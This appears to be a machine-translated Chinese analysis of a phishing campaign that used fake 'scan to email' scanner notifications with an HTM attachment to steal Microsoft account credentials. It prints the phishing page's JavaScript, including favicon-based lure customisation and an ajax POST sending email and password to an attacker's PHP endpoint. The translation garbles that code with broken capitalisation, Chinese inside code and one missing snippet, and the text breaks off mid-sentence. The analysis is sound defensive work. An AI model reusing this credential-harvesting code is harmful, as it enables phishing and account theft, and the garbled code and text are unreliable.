十年来的大部分时间里,恶意攻击者一直在利用扫描仪和复印机等文档处理办公设备的“扫描到电子邮件”功能作为诱饵,以说服目标用户在他们的机器上安装恶意软件。然而,最近我们注意到员工收到的电子邮件使用了类似的诱饵,但意图不是恶意软件安装,而是帐户凭据网络钓鱼(针对Microsoft Live帐户),这说明此特定攻击媒介已从恶意软件有效负载演变为泄露帐户凭据。电子邮件诱饵最近,工作人员收到一封电子邮件,告诉他们已经准备好了一份扫描文件,据称扫描工作是在位于“前台”的“The Intercept DocuCentre-SCANFX-2EFF73”扫描仪上完成的。这封电子邮件包括一个HTM文件作为附件,并声称来自“the intercept Sharepoint Scanner”。发件人名称“the intercept Sharepoint Scanner”试图利用各种扫描仪的功能将文档发送到Microsoft SharePoint库。在钓鱼邮件中被恶搞的施乐(Xerox)品牌就有这样的功能。这个阶段的一个小危险信号是SharePoint已经被错误地定义为“Sharepoint”,并且邮件包含不规则的大小写(“A New File is scanned to you”)。仔细查看发件人字段会发现,该电子邮件不是来自公司内部电子邮件,而是来自no-reply-exchangelab-apcprd01.documentation.protection.ocbc35853@phumaianh-vn[.]com.。长达64个字符的用户名似乎是为了混淆域名与电子邮件声称来自的公司域名不匹配(在我们的案例中,电子邮件声称来自The Intercept)。查看有效负载HTM文件的页面源代码的网络钓鱼有效负载显示,网络钓鱼页面通过对源代码中的多个字符使用百分比编码来部署基本的模糊处理。取消转义代码会揭示人类可读的页面源代码,因为网络钓鱼者没有使用进一步的模糊处理技术。如果用户打开HTM文件,则会在模糊的文档背景上显示登录提示。模糊的文档背景似乎设计为Adobe Acrobat的模糊表示,并放置登录覆盖以使用户认为文档将在他们登录后显示。模糊的背景图像通过以下代码加载:位于未受保护的../xero/目录中的其他可疑文件的存在表示ForexliteOption[.]com域可能已被攻击者破坏,以促进其网络钓鱼活动。在网络钓鱼登录页面上还有一些更值得注意的次要事件。第一个是为用户预填电子邮件地址。这对恶意HTM文件的每个实例的网络钓鱼者都是唯一的,以及促进网络钓鱼页面的额外自动定制有额外的好处。登录提示符的顶部装饰有目标组织的徽标,而登录提示符的标题包括组织的名称(虽然空格不正确)。这些自定义效果通过以下代码实现:var email=$(“#email”).val();console.log(Email);var domain=email.substring(email.lastIndexOf(“@”)+1);var frmsite=domain.substring(0,domain.lastIndexOf(“.”));Document.getElementById(“fieldImg”).src=`https://api.statvoo.com/favicon/?url=${domain}`;document.getElementById(“head-message”).innerHTML=`${ucFirst(Frmsite)}安全文档`钓鱼页面使用预先填写的电子邮件解析域名,然后使用域名填充‘.。安全文档的标题字段,并从域获取收藏夹图标并将其插入登录提示的顶部。钓鱼页面使用的StatvooAPI(反过来调用https://www.google.com/s2/favicons?sz=64&domain_url=)来获取收藏图标)。具有讽刺意味的是,Statvoo提供网站评论和统计数据,其设计初衷是“避免网络诈骗和不安全的网站”。如果用户输入密码并按下Login按钮,按钮将更改为“Verifing”(屈从于基本拼写错误的常见网络钓鱼红旗)。网络钓鱼页面然后将用户凭证传递到第三方站点:{$.ajax({DataType:‘JSON’,URL:‘https://server.bossthraed.com/kelval.php’,TYPE:‘POST’,数据:{Email:Email,Password:Password,Detail:Detail,}然后,位于Bossthraed[.].com上的PHP脚本提供给定的信号响应。如果收到的响应为no-auth,表示凭据无效,则网络钓鱼页面会显示一条消息,指出凭据不正确(t